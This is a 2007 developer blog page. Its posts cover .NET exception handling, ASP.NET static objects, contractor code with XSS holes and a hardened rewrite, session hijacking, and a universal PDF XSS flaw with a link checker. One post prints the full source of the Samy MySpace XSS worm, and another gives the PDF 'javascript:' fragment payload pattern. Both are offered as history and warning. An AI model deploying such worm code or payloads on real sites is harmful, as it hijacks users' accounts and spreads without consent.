On this page

Wrapping Unhandled exceptions from a WinForm application
Static objects in aspx page - Bad idea
Hasty hiring makes the project go very long.
Session hijacking - prevention oriented
A White-Hat hacker - moral issues
Israeli Bloggers dinner - 21.02.07
A new blog on the web.
PDF document - vulnerability out of the box.
An XSS worm - Historic event
document.cookie - Different behavior in IE7

 Sunday, March 04, 2007
Sunday, March 04, 2007 6:35:22 PM (GMT Standard Time, UTC+00:00) ( .Net | Architectural solutions | Threading )

A couple of weeks ago, my friend and co-worker, Shani Raba, presented me with a problem.
They have a sealed application, an .exe file, that throws exceptions and crashes.

So I thought it would be a good idea to wrap the target application using reflection and catch the unhandled exceptions it throws.

To demonstrate this,
I've created an application with a button that throws an exception.

private void button1_Click(object sender, System.EventArgs e)
{
    throw new Exception("my Exception, need to be wrapped");
}

The next thing we need to create is the wrapper.

So, creating a console application with this code should have solved the problem:

[STAThread]
static void Main(string[] args)
{

    Assembly assembly = Assembly.LoadFrom ("cashTester.exe");

    Type t = assembly.GetType("cashTester.Form1");
    object o = Activator.CreateInstance(t);
    try
    {
        Application.Run((Form)o);
    }
    catch(Exception ex)
    {
        Console.Write("exception was thrown : " + ex.Message);
    }
}

Running this code in debug mode successfully catches the exception from the WinForm.
But, for some reason, in a normal run this code won't catch the exception.

Makes you wonder, huh?

So I did some thinking: what on earth could cause this phenomenon?
The answer is: threads.
Yes, like it or not, this is the subject that everyone tries to avoid.
Everyone knows it exists, and no one really likes it,
but we can't run from the problem, we need to confront it.

So, what can we do?

Since Application.Run launches a new thread, we can attach an exception-handling method to the Application.ThreadException event.

Like this class:


using System;
using System.Reflection;
using System.Windows.Forms;

/// <summary>
/// The Wrapper class
/// </summary>
public class Wrapper
{

    /// <summary>
    /// Public constructor
    /// </summary>
    public Wrapper()
    {
    }

    /// <summary>
    /// This function will initialize the exception handling
    /// </summary>
    public void Init()
    {
        // define handlers for unhandled exceptions
        AppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(this.exp);
        Application.ThreadException +=new System.Threading.ThreadExceptionEventHandler(this.ThreadExp);
    }

    /// <summary>
    /// This method is for the threads exceptions
    /// </summary>
    /// <param name="o">the object</param>
    /// <param name="args">Thread exception args</param>
    void ThreadExp(object o, System.Threading.ThreadExceptionEventArgs args)
    {
        // Write the message to the console
        Console.Write("Unhandled thread exception was thrown : " + args.Exception.Message);
    }

    /// <summary>
    /// This method is for the unhandled exceptions from the main thread
    /// </summary>
    /// <param name="o">the object</param>
    /// <param name="args">exception arguments</param>
    void exp(object o,System.UnhandledExceptionEventArgs args)
    {
        // Write the message to the console
        Console.Write("Unhandled exception was thrown : " + ((Exception)args.ExceptionObject).Message);
    }

    public void Run()
    {
        // Load the assembly
        Assembly assembly = Assembly.LoadFrom ("cashTester.exe");

        // get the type of the object
        Type t = assembly.GetType("cashTester.Form1");

        // invoke it
        object o = Activator.CreateInstance(t);

        // Run the application - note that this line starts an additional thread
        Application.Run((Form)o);
    }
}

Now all we need is to launch it:

/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main(string[] args)
{
    Wrapper w = new Wrapper();
    w.Init();
    w.Run();
}

Now we have an exception wrapper for launching applications.

Shani, tell me if that helped...

P.S.
There are more ways to do it, but this is the simplest one.

Sunday, March 04, 2007 12:17:48 PM (GMT Standard Time, UTC+00:00) ( .Net | Architectural solutions )

Yesterday, a good friend of mine, Lev Rosenblit, asked me a good question:
what is the life cycle of static objects in an aspx page?
At first, without any hesitation, I answered that the object dies when the request ends.
The dude insisted that I was wrong on that matter, so I decided to check it out.

Here is a code snippet to check it:

        private static int myStaticInt = 0;
        private void Page_Load(object sender, System.EventArgs e)
        {
            myStaticInt++;
            Response.Write(myStaticInt);
        }

In theory (which says that objects in an aspx page die at the end of the request), this code should print the number "1" on each request.
But the result was different: on each request, the number increased.

Digging a little on the web, I found that static objects live inside the App domain and not in the page context.
This interesting fact raised an interesting question, an architectural one:
what would happen if the code runs in an NLB (Network Load Balancing) configuration?

On that matter there is the session state issue, which is solved by getting the session state from a shared database,
but what about the static objects that live inside the App domain?
What can be done to share those objects?

From my point of view, choosing to use static objects inside your page is a bad architectural choice.
It won't always work, and the system will be hardware dependent.

 Friday, March 02, 2007
Friday, March 02, 2007 11:02:59 PM (GMT Standard Time, UTC+00:00) ( .Net | Life | XSS )

Let me tell you a story that's happening right now.
A couple of months ago I hired some folks to do part of a project, due to the time limits that I have.
Now, I know those guys personally, and checking their technical background seemed irrelevant (mistake no. 1).
I thought, how hard can it be to make a GUI for an application where all the other layers are done (3-tier architecture)?

So instead of 1 month of development, it has already turned into more than 3 months (30% progress),
and God knows how long it will take them to finish it.

And now, when I finally see some progress, I see code like this:

if (!Page.IsValid)
{
}
else
{
    InsertNewCustomer();
    lblClientMessage.Text = NewClientText();
    ClearText();
}

OK, who are those guys?
You'd think that a skilled programmer with 3 years of experience would not write crappy code like this (those things just get me mad).
Why do they think that I would allow such code to go to production?
Not to mention the XSS holes that they made (just by the book...).
Looks like they didn't read this guide.

I mean, look at this thing; how many mistakes can you make in a single piece of code:

        private string NewClientText()
        {
            string strNewClient = txtName.Text + " " + txtFamily.Text + " " + "הוזן בהצלחה";
            return strNewClient;
        }

        private void btnAdd_Click(object sender, System.EventArgs e)
        {
            lblClientMessage.Text = "";

            if (!Page.IsValid)
            {
            }
            else
            {
                InsertNewCustomer();
                lblClientMessage.Text = NewClientText();
                ClearText();
            }
        }

        private void InsertNewCustomer()
        {
            Customers newCustomer = new Customers();

            newCustomer.Name = txtName.Text;
            newCustomer.LastName = txtFamily.Text;
            newCustomer.Notes = txtNotes.Text;
            newCustomer.isStudent = chkStudent.Checked;
            newCustomer.Phone = TxtPhone.Text;
            newCustomer.Cellular = txtCellular.Text;
            newCustomer.Email = txtEmail.Text;
            newCustomer.Address = txtAddress.Text;

            if (txtBirth.Text.Trim() != "")
            {
                newCustomer.BirthDate = Convert.ToDateTime(txtBirth.Text);
            }

            custDal.Add(newCustomer);
        }

  • writing data to the page without validating it first
  • some logical twists (if the page is not valid, don't do anything, else do something...) - why on earth? why?
  • inserting into the database without validating the input (for those who are familiar with my architecture, validating is a single line: "entity.Validate();")
  • no exception management whatsoever
  • no code comments
  • client-side input validations
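
The first four points, fixed side by side with the original pattern. This is an added example, not code from the project: the page's text boxes become plain string parameters so it runs as a console program, the success message is an English stand-in, and the 50-character limit and the `insert` delegate (standing in for `custDal.Add`) are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Net;

// Added example (not the project's code): control values are passed as strings
// so the sketch runs stand-alone.
public static class NewCustomerDemo
{
    // The page's pattern: user text goes into the label markup unencoded.
    public static string NewClientTextUnsafe(string name, string family)
    {
        return name + " " + family + " was added successfully";
    }

    // Hardened: HTML-encode user text at the point of output.
    // (Inside a WebForms page, Server.HtmlEncode does the same job.)
    public static string NewClientTextSafe(string name, string family)
    {
        return WebUtility.HtmlEncode(name + " " + family) + " was added successfully";
    }

    // Server-side validation; the length limit is an assumed business rule.
    public static List<string> Validate(string name, string family, string birth)
    {
        var errors = new List<string>();
        if (string.IsNullOrWhiteSpace(name) || name.Length > 50) errors.Add("name");
        if (string.IsNullOrWhiteSpace(family) || family.Length > 50) errors.Add("family");
        DateTime parsed;
        // TryParse instead of Convert.ToDateTime, which throws on bad input.
        if (!string.IsNullOrWhiteSpace(birth) && !DateTime.TryParse(birth, out parsed))
            errors.Add("birth date");
        return errors;
    }

    // Shape of the click handler: reject first, then insert, then encoded output.
    public static string AddCustomer(string name, string family, string birth, Action insert)
    {
        List<string> errors = Validate(name, family, birth);
        if (errors.Count > 0)
            return "Invalid input: " + string.Join(", ", errors);
        try
        {
            insert(); // stands in for custDal.Add(newCustomer)
        }
        catch (Exception)
        {
            return "The customer could not be saved."; // details go to a server-side log
        }
        return NewClientTextSafe(name, family);
    }

    public static void Main()
    {
        string name = "<script>alert(1)</script>"; // constructed sample input
        Console.WriteLine(NewClientTextUnsafe(name, "Cohen"));
        Console.WriteLine(AddCustomer(name, "Cohen", "1980-05-01", () => { }));
        Console.WriteLine(AddCustomer("Dana", "", "not a date", () => { }));
    }
}
```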

Here are some more goodies from the same author:

lblAddress.Style.Add("text-align","right");

What happened to CSS files?
There are lots of lines like this, defining the style for every object.
I don't want to know what they plan to do when they need to change the styles one by one.

Man, this is a little piece of code; I'm afraid to see what's going on in the rest of the code.

These are the lessons that you learn the hard way...

"i will never hire people without checking their technical background"
"i will never hire people without checking their technical background"
"i will never hire people without checking their technical background"
"i will never hire people without checking their technical background"
"i will never hire people without checking their technical background"
"i will never hire people without checking their technical background"

I'd better take some things into my own hands before it gets too late.
Anyone want a job creating a GUI?

Friday, March 02, 2007 1:32:40 PM (GMT Standard Time, UTC+00:00) ( .Net | Architectural solutions | Lessons | Security | XSS )

Well,
after months of talking about it and a couple of sleepless nights preparing it, here it is.

So, what do we have here?

1 PowerPoint presentation that explains what Session Hijacking and XSS are.
1 XSS demo.
0 Session hijacking demos... (Why, you ask? I'm planning to do another lecture on the topic for those who missed it yesterday...)
0 Code included. (Like the demos... it will be uploaded some time soon...)

Long story short:
this presentation talks about the threats of session hijacking
and how to prevent it. While it's not a 100% solution, it certainly raises the bar for hackers to succeed in a session hijacking attack.

Some wise man said to me once,
"For every defense that was ever made, someone thought of how to break it;
 the only thing we can do is narrow down the number of people who are capable of performing it."

Enjoy.

Comments are welcome :)

Security.pps (324 KB)

 Tuesday, February 20, 2007
Tuesday, February 20, 2007 7:50:27 AM (GMT Standard Time, UTC+00:00) ( Life | Security )
Ok, I'm facing a dilemma here.
Many of the site checks I've done returned positive results for security holes.
Now, the question is: what do I do next with this info?

The obvious options are:
•    Do nothing with this info.
•    Write a full technical report on the security holes that I found around the web (maybe a video demo?).
•    Open a security site that holds data about security vulnerabilities.
•    Provide some demos of the hack.
•    Report the problem to the site that has it.
•    Try to make money off it? (This option is more suited to a black hat hacker...)
•    Obtain the reputation of a Web security expert by exposing the security holes?
I remind you that there can be consequences for the actions taken (jail is not the favorite option...)

What do you think I should do?
Please comment here...

Your opinion is very important to me.
 Friday, February 16, 2007
Friday, February 16, 2007 1:58:59 PM (GMT Standard Time, UTC+00:00) ( Blog related )
If you haven't been to such an event, and you match the criteria (an Israeli blogger...)
I haven't been to one of those, but judging by the comments on the last event (the previous dinner), this event is something you want to be at.

Check out the organizer's post: http://blogs.microsoft.co.il/blogs/omer/archive/2007/02/13/8020.aspx

 Sunday, February 11, 2007
Sunday, February 11, 2007 10:06:31 AM (GMT Standard Time, UTC+00:00) ( @ff Topic | Blog related )

A new blog surfaced in the last few days.
This one is from Doron Yaacoby.

This dude knows what he's talking about.
I would strongly recommend paying this guy a visit.

 Friday, February 09, 2007
Friday, February 09, 2007 7:12:20 PM (GMT Standard Time, UTC+00:00) ( Security | XSS )

Sounds controversial, right?
Well, it is.

Actually, under certain conditions, you can execute JavaScript on the client's machine using a PDF file.
The funny part is that the file does not need to be modified at all.

Simply create a link following this pattern:

http://yoursite.com/file.pdf#whatever_name_you_want=javascript:your_code_here

There is XSS written all over the place.
The sad part is that there is nothing the site owners can do to prevent it.
This works with:

Firefox 2.0.0.1 win32
Firefox 1.5.0.8 win32
Opera 8.5.4 build 770 win32
Opera 9.10.8679 win32
and I'm sure with other browsers too.

The subject was brought to Adobe's attention:
http://www.adobe.com/support/security/advisories/apsa07-01.html
Adobe categorizes this as a critical issue and recommends affected users update any affected software.
http://www.adobe.com/support/security/bulletins/apsb07-01.html

How does this work? (And why???)

The PDF document accepts parameters; the odd thing is that the values of those parameters can be retrieved via JavaScript.

More info can be found on these sites:
http://ha.ckers.org/blog/20070103/universal-xss-in-pdfs/
http://www.gnucitizen.org/blog/danger-danger-danger/

Be careful the next time you open a PDF file.
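
The part of the URL after # is never sent to the server, so request logs will not show this pattern; what a site can check is links that users submit for publication. The checker below is an added example, not code from the original post: the class and method names are hypothetical and the sample links are constructed from the pattern above.

```csharp
using System;
using System.Linq;

// Added example; class and method names are hypothetical.
public static class PdfLinkCheck
{
    // True when the link targets a .pdf over http(s) and its fragment carries
    // a javascript: value, the pattern shown in the post.
    public static bool IsSuspiciousPdfLink(string link)
    {
        Uri uri;
        if (!Uri.TryCreate(link, UriKind.Absolute, out uri)) return false;
        if (uri.Scheme != Uri.UriSchemeHttp && uri.Scheme != Uri.UriSchemeHttps) return false;
        if (!uri.AbsolutePath.EndsWith(".pdf", StringComparison.OrdinalIgnoreCase)) return false;

        // Decode percent-escapes and drop whitespace/control characters before
        // matching, so encoded or padded spellings of the scheme are caught too.
        string fragment = Uri.UnescapeDataString(uri.Fragment);
        string compact = new string(fragment
            .Where(c => !char.IsWhiteSpace(c) && !char.IsControl(c)).ToArray());
        return compact.IndexOf("javascript:", StringComparison.OrdinalIgnoreCase) >= 0;
    }

    public static void Main()
    {
        // Constructed sample links, modelled on the pattern in the post.
        string[] links =
        {
            "http://yoursite.com/file.pdf#whatever=javascript:alert(1)",
            "http://yoursite.com/file.pdf#x=JavaScript%3Aalert(1)",
            "http://yoursite.com/file.pdf#page=3",
            "http://yoursite.com/page.html#x=javascript:alert(1)"
        };
        foreach (string link in links)
            Console.WriteLine((IsSuspiciousPdfLink(link) ? "FLAG  " : "ok    ") + link);
    }
}
```

Only the first two links are flagged; the third has a harmless fragment and the fourth is not a PDF.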

Friday, February 09, 2007 6:09:55 PM (GMT Standard Time, UTC+00:00) ( Security | XSS )

OK, maybe this is not something new, but it's definitely not something common.

If you haven't read my post on XSS prevention, please do so.

The story begins back in 10/04/05, when Samy decided to get popular on MySpace.
He exploited the fact that MySpace allowed the user to enter some JavaScript into the personal page.

So the dude explored the MySpace system and crafted a script that adds himself to the viewer's friend list.
Technically, this is not a worm, but the replication of the code to each viewer's page qualifies it as a worm.

Here is the code of the worm:

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')"
expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var 
AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

 

The explanation of the code can be found here.
This shows several things:

  • XSS can be exploited for major attacks, even for personal gain.
  • XSS can be underestimated.

Please don't underestimate it.
It could do some major damage to your application.

To prove my point, I will include a demo in the next security post (session hijacking prevention).

 Saturday, February 03, 2007
Saturday, February 03, 2007 6:23:50 PM (GMT Standard Time, UTC+00:00) ( Internet Explorer )

Today I was hoping to finish my "Session hijacking prevention" presentation,
so I thought that recording a live demo would be nice.

And then (by mistake...) I discovered that document.cookie will give you an empty string in Internet Explorer 7.
Nevertheless, it works fine in previous versions of Explorer and in Firefox.

Did Microsoft restrict access to cookies via JavaScript in IE7?